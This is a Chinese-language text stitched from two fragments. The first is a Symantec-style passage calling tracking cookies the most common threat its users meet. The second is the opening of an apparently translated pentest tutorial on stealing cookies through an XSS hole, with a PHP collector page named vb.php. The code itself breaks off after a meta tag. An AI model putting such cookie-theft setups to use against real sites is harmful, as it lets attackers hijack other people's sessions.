赛门铁克的产品每天都会拦截到数以万计的各种威胁，您或许有兴趣想知道哪种威胁是最频繁出现，也是最常见的。它既不是近期常出现的W32.Stuxnet之类的蠕虫，也不是W32.Virut之类的病毒，更不是我们长期的一般性监测中的某一个威胁（例如Backdoor.Trojan）。赛门铁克防病毒产品的用户最常遇到的是来自Tracking Cookie（跟踪Cookie）的威胁。
Cookie是一个纯文本文件，存储了有关用户网页浏览内容的数据。虽然Cookie一词貌似无害，但事物都是有两面性的，Cookie也不例外。
...

author:

pentest

譯:[hiphop]

收集:X.DW

使用的工具：

1.免费网页支援PHP

2.存在xss的脆弱的网站。

vb.php为存放cookie的网页

PHP Code:

<head>
<meta http-equiv="Content-Language" content="it">
...